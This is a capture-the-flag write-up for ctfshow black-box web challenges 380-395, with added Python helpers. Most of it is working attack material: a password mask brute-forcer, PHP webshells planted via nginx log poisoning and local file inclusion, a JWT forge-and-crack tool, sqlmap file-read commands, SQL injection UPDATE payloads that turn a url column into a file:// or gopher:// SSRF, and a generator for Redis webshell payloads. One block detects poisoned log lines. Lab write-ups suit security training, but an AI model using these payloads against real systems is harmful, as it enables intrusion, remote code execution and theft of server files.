ctfshow Black-Box Testing, web380-395

Preface

A summary of the black-box testing approach used for this series.

Wordlist that may come in handy:

xy123
admin888
/install/index.php
/clear.php
/page.php
/alsckdfy/index.php
/debug

web380: test the URL parameters

web381: find the admin backend

web382, 383: SQL universal password (login bypass)

web384: brute force

Filtering has been added here, so the universal password no longer works.

Brute force instead.

Wordlist generation (two lowercase letters followed by three digits, the same shape as xy123):

import string

s1 = string.ascii_lowercase  # lowercase letters a-z
s2 = string.digits           # digits 0-9
# every combination of letter, letter, digit, digit, digit: 26*26*10*10*10 = 676,000 lines
with open('dict.txt', 'w') as f:
    for i in s1:
        for j in s1:
            for k in s2:
                for l in s2:
                    for m in s2:
                        f.write(i + j + k + l + m + "\n")

Result: admin / xy123
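
The five nested loops above only cover one fixed shape. The following is an added example (not code from the writeup) that generalises the generator into a hashcat-style mask (?l = lowercase letter, ?d = digit) produced lazily, and adds a driver that stops at the first accepted candidate. The login check is a constructed stand-in so the block runs offline; against the real target it would be the HTTP POST to the login form, and the field names and failure marker for that form are not given on the page.

```python
import itertools
import string
from typing import Callable, Iterable, Iterator, Optional

# Hashcat-style mask charsets: ?l = lowercase letter, ?d = digit, ?u = uppercase letter.
CHARSETS = {
    "l": string.ascii_lowercase,
    "d": string.digits,
    "u": string.ascii_uppercase,
}


def mask_candidates(mask: str) -> Iterator[str]:
    """Yield every string matching a mask such as '?l?l?d?d?d', in lexical order.

    Generated lazily, so the 676,000 candidates never have to be held in memory
    or written to dict.txt first.
    """
    if len(mask) % 2 or mask[::2] != "?" * (len(mask) // 2):
        raise ValueError("mask must be a sequence of ?x tokens")
    positions = [CHARSETS[mask[i + 1]] for i in range(0, len(mask), 2)]
    for combo in itertools.product(*positions):
        yield "".join(combo)


def mask_size(mask: str) -> int:
    """Number of candidates the mask expands to (26*26*10*10*10 for ?l?l?d?d?d)."""
    size = 1
    for i in range(1, len(mask), 2):
        size *= len(CHARSETS[mask[i]])
    return size


def brute_force(check: Callable[[str], bool], candidates: Iterable[str]) -> Optional[str]:
    """Try candidates in order and return the first one that check() accepts."""
    for pw in candidates:
        if check(pw):
            return pw
    return None


# Constructed stand-in for the login check so the example runs offline.
# Against the target this would be a POST to the login form, e.g.
#   lambda pw: "login failed" not in requests.post(url, data={"u": "admin", "p": pw}).text
# (the form field names and the failure string are assumptions, not from the page).
def fake_login(password: str) -> bool:
    return password == "xy123"


if __name__ == "__main__":
    print(mask_size("?l?l?d?d?d"))
    print(brute_force(fake_login, mask_candidates("?l?l?d?d?d")))
```

Because the candidates come out in lexical order, xy123 sits near the end of the keyspace (index 622,123 of 676,000), which is why a blind mask is only practical when a rate limit is absent and the shape of the password is already known.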

web385: information disclosure

Note that the scheme must be http (the page is not reachable over https); then go on to the backend address as before.

web386: file inclusion

Visit clear.php:

From experience the parameter name is file; pointing it at the install lock removes that file: /clear.php?file=./install/lock.dat

Visit /install/ again and the installer is back:

Then go to /alsckdfy/index.php and log in with the default password.

web387: writing a webshell through the log

Pass it a file parameter: /debug/?file=/etc/passwd returns the file, so there is a local file inclusion. Include the nginx access log instead: ?file=/var/log/nginx/access.log

PHP placed in the User-Agent is now executed whenever the log is included, giving command execution.

Alternatively, send either of these in the User-Agent (remove the install lock, or copy the flag file somewhere readable):

<?php unlink('/var/www/html/install/lock.dat')?>
<?php system('cat /var/www/html/alsckdfy/check.php > /var/www/html/1.txt')?>

web388: bypassing the filter

Python script to send the requests (the webshell is base64-encoded so the literal tag never appears in the User-Agent):

import requests
import base64

url = "http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/"
url2 = "http://fb707431-ebb7-41c8-9ce7-57da16163fec.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd = b"<?php eval($_POST[1]);?>"
cmd = base64.b64encode(cmd).decode()  # base64 so the filter never sees the literal webshell
headers = {
    # the shell decodes it on the server and writes it as b.php under the web root
    'User-Agent': '''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd)
}
print(headers)
requests.get(url=url, headers=headers)  # 1. poison the access log
requests.get(url2)                      # 2. include the log: the PHP runs and drops b.php
print(requests.post(url + 'b.php', data={'1': 'system("cat alsckdfy/check.php");'}).text)  # 3. use the shell
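
Added example for web387 and web388 (not code from the writeup): it factors the User-Agent construction out of the script above, shows why the base64 wrapper matters, and adds the defender's view of the same trick, a parser for nginx's combined log format that flags any request field carrying a PHP open tag. The log lines are constructed, not a real capture; the paths and the b.php name follow the writeup. Note that nginx escapes double quotes, backslashes and control characters in logged variables as \xNN, which is why the payload only uses single quotes.

```python
import base64
import re
from typing import List, Tuple

# Template follows the writeup's payload: the shell decodes the base64 and writes it under the web root.
PHP_TEMPLATE = "<?php system('echo {b64}|base64 -d > {path}');?>"


def build_poison_ua(php_source: str, path: str = "/var/www/html/b.php") -> str:
    """User-Agent that drops php_source at `path` once the log line holding it is include()d.

    Base64 keeps the literal '<?php eval(' out of the log (what the web388 filter looks for)
    and keeps shell metacharacters such as $ and ; out of the echo command.
    """
    b64 = base64.b64encode(php_source.encode()).decode()
    return PHP_TEMPLATE.format(b64=b64, path=path)


# nginx 'combined' format: ip - user [time] "request" status bytes "referer" "user-agent"
_COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Anything PHP would execute if the log file is include()d.
_PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def find_poisoned(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client ip, offending field) for every log line carrying a PHP open tag.

    UA, referer and request line are all attacker-controlled, so a log that PHP can
    include is untrusted input; this is the detection side of log poisoning.
    """
    hits = []
    for line in lines:
        m = _COMBINED.match(line)
        if not m:
            continue
        for field in ("ua", "referer", "request"):
            if _PHP_TAG.search(m.group(field)):
                hits.append((m.group("ip"), m.group(field)))
                break
    return hits


def decode_dropped_shell(ua: str) -> str:
    """Recover the PHP a poisoned User-Agent would write (inverse of build_poison_ua)."""
    m = re.search(r"echo ([A-Za-z0-9+/=]+)\|base64 -d", ua)
    if not m:
        raise ValueError("no base64 echo payload in user-agent")
    return base64.b64decode(m.group(1)).decode()


# Constructed sample log: one benign request, one poisoned, one triggering the inclusion.
POISON_UA = build_poison_ua("<?php eval($_POST[1]);?>")
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Sep/2021:21:20:53 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Sep/2021:21:21:10 +0000] "GET / HTTP/1.1" 200 512 "-" "%s"' % POISON_UA,
    '10.0.0.9 - - [13/Sep/2021:21:21:12 +0000] "GET /debug/?file=/var/log/nginx/access.log HTTP/1.1" 200 9000 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for ip, field in find_poisoned(SAMPLE_LOG):
        print(ip, "->", decode_dropped_shell(field))
```

The third sample line is the tell on the server side: a request whose file parameter names the access log, immediately after a request with a PHP tag in its User-Agent from the same client.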

web389: JWT

# Same chain as web388, but the admin JWT is sent in the auth cookie on every request
import requests
import base64

url = "http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/"
url2 = "http://bf2e6fca-c437-4f5b-90c3-75b4087cfdc5.chall.ctf.show/debug/?file=/var/log/nginx/access.log"
cmd = b"<?php eval($_POST[1]);?>"
cmd = base64.b64encode(cmd).decode()
headers = {
    'User-Agent': '''<?php system('echo {0}|base64 -d  > /var/www/html/b.php');?>'''.format(cmd),
    'Cookie': 'auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYxMDQ0MDA5MSwiZXhwIjoxNjEwNDQ3MjkxLCJuYmYiOjE2MTA0NDAwOTEsInN1YiI6ImFkbWluIiwianRpIjoiYzNlM2U5NjQ4OGI3NWY0MzY4YmE4Njg0ZTRjZWJlZTQifQ.hEV8CkkdvhKsNL_OrssrBzjzstVhq7_sQNefiuplSqU'
}
print(headers)
requests.get(url=url, headers=headers)   # poison the log (cookie needed to reach the page)
requests.get(url2, headers=headers)      # include the log, dropping b.php
print(requests.post(url + 'b.php', data={'1': 'system("cat alsckdfy/check.php");'}, headers=headers).text)
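
The script reuses the token without looking at it. The following added example (not from the writeup) decodes that cookie's header and claims, verifies or forges an HS256 signature, and runs an offline dictionary attack on the HMAC secret. Decoding shows alg HS256, iss/sub admin and exp 1610447291 (January 2021), yet the writeup still used the token in September 2021, so expiry is evidently not enforced server-side. The real secret is unknown here; the forge-and-crack demonstration uses the constructed secret admin888 from the wordlist at the top of the page.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional, Tuple

# Token copied from the auth cookie in the web389 script above.
TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJpc3MiOiJhZG1pbiIsImlhdCI6MTYxMDQ0MDA5MSwiZXhwIjoxNjEwNDQ3MjkxLCJuYmYiOjE2MTA0NDAwOTEs"
    "InN1YiI6ImFkbWluIiwianRpIjoiYzNlM2U5NjQ4OGI3NWY0MzY4YmE4Njg0ZTRjZWJlZTQifQ."
    "hEV8CkkdvhKsNL_OrssrBzjzstVhq7_sQNefiuplSqU"
)


def _b64url_decode(s: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).decode().rstrip("=")


def decode_jwt(token: str) -> Tuple[dict, dict]:
    """Header and claims WITHOUT verification: the first thing to read in a captured token."""
    h, p, _sig = token.split(".")
    return json.loads(_b64url_decode(h)), json.loads(_b64url_decode(p))


def verify_hs256(token: str, secret: bytes) -> bool:
    """Recompute HMAC-SHA256 over 'header.payload' and compare in constant time."""
    h, p, sig = token.split(".")
    expected = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def forge_hs256(claims: dict, secret: bytes) -> str:
    """Mint a token with arbitrary claims; only possible once the secret is known or guessed."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def crack_hs256(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on the HMAC secret: no requests go to the target."""
    for word in wordlist:
        if verify_hs256(token, word.encode()):
            return word
    return None


if __name__ == "__main__":
    header, claims = decode_jwt(TOKEN)
    print(header)
    print(claims)
    # Constructed demo: sign with a weak secret, then recover it from the page's wordlist.
    demo = forge_hs256(claims, b"admin888")
    print(crack_hs256(demo, ["xy123", "admin888"]))
```

If crack_hs256 ever returned a word for the real cookie, forge_hs256 would let you mint a fresh admin token instead of replaying an expired one; with the secret unknown, replaying the captured token is exactly what the script above does.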

web390

page.php has a SQL injection.

One sqlmap command takes care of it:
sqlmap -u http://fdbabc63-b2f3-4050-8b2e-9f5ee609119a.chall.ctf.show/page.php?id=2 --file-read /var/www/html/alsckdfy/check.php --batch
When it finishes, sqlmap saves the retrieved file locally and prints the path; open it to get the flag.

web391, 392

sqlmap again, this time against search.php:

sqlmap -u http://042a780b-dfd3-4bd9-861c-81661b2915e0.chall.ctf.show/search.php?title=1 --file-read /var/www/html/alsckdfy/check.php --batch

web393

A search engine appears.

Its URL is /link.php?id=4.

It takes a parameter, so it is almost certainly backed by the database. The injection point from the previous challenge can be used for an insert or update injection, and because link.php fetches whatever is stored in the url column, that gives an SSRF to read local files: a';update link set url='file:///flag' where id = 1;#

image-20210915145146426

The table name link can be enumerated with sqlmap.

web394, 395

Method 1:

a';update link set url=0x66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870 where id = 1;#

The hex literal decodes to file:///var/www/html/alsckdfy/check.php; using 0x... means the injected value needs no quote characters.

Method 2:

Use Gopherus to reach the local Redis service through the SSRF.

The generated payload is too long for the url column, so change the column type first: a';alter table link modify column url text;#

Then the Redis SSRF payload from web360 can be used as-is (hex-encoded, with the ; separator the original post dropped between a' and update):

a';update link set url=0x676f706865723a2f2f3132372e302e302e313a363337392f5f2532413125304425304125323438253044253041666c757368616c6c2530442530412532413325304425304125323433253044253041736574253044253041253234312530442530413125304425304125323432382530442530412530412530412533432533467068702532306576616c2532382532345f504f5354253542312535442532392533422533462533452530412530412530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343325304425304164697225304425304125323431332530442530412f7661722f7777772f68746d6c2530442530412532413425304425304125323436253044253041636f6e666967253044253041253234332530442530417365742530442530412532343130253044253041646266696c656e616d65253044253041253234372530442530416162632e706870253044253041253241312530442530412532343425304425304173617665253044253041253041 where id = 2;#

Then visit link.php?id=2: abc.php is written under the web root, and the shell password is 1.
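
Rather than copy one opaque hex blob, the following added example (not code from the writeup or from Gopherus) rebuilds it: it encodes the Redis commands in RESP, wraps them in the gopher:// URL the way Gopherus' Redis PHP-shell mode does (flushall, set a key to the shell padded with newlines, config set dir and dbfilename, save), hex-encodes the result for the MySQL UPDATE, and emits the same injection strings for both methods. It assumes what the writeup implies: Redis on 127.0.0.1:6379 without a password, a web root the redis user can write, and the link table with a url column that has already been widened to text.

```python
from urllib.parse import quote

REDIS_GOPHER_PREFIX = "gopher://127.0.0.1:6379/_"


def resp_encode(*args: str) -> str:
    """Encode one Redis command as a RESP array: *N, then $len and value per argument."""
    out = ["*%d\r\n" % len(args)]
    for a in args:
        out.append("$%d\r\n%s\r\n" % (len(a.encode()), a))
    return "".join(out)


def redis_webshell_gopher(shell: str, webroot: str, filename: str) -> str:
    """gopher:// URL that makes the SSRF client replay a Redis session which writes
    `shell` to webroot/filename via CONFIG SET dir/dbfilename followed by SAVE.

    Command sequence, newline padding and trailing newline match Gopherus' output
    for its Redis PHPShell mode, so the result can be checked against the blob above.
    """
    body = "\n\n" + shell + "\n\n"  # padding separates the PHP from the RDB bytes around it
    session = (
        resp_encode("flushall")
        + resp_encode("set", "1", body)
        + resp_encode("config", "set", "dir", webroot)
        + resp_encode("config", "set", "dbfilename", filename)
        + resp_encode("save")
        + "\n"
    )
    # percent-encode so CR/LF, '*' and '$' survive inside the URL ('/' stays literal)
    return REDIS_GOPHER_PREFIX + quote(session)


def mysql_hex(value: str) -> str:
    """0x... literal: lets the UPDATE carry a string without any quote characters."""
    return "0x" + value.encode().hex()


def update_link_injection(url_value: str, row_id: int) -> str:
    """Payload for the search.php injection: rewrite link.url so link.php?id=N fetches url_value."""
    return "a';update link set url=%s where id = %d;#" % (mysql_hex(url_value), row_id)


if __name__ == "__main__":
    # Method 1: file:// read of the flag-holding script
    print(update_link_injection("file:///var/www/html/alsckdfy/check.php", 1))
    # Method 2: Redis via gopher, dropping abc.php with password 1
    gopher = redis_webshell_gopher("<?php eval($_POST[1]);?>", "/var/www/html", "abc.php")
    print(update_link_injection(gopher, 2))
```

The gopher URL is about 800 bytes once percent-encoded, which is why the url column has to be widened before Method 2; Method 1's file:// URL fits the original column. Changing webroot or filename regenerates a valid payload without going back to Gopherus.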

Origin blog.csdn.net/qq_50589021/article/details/120309793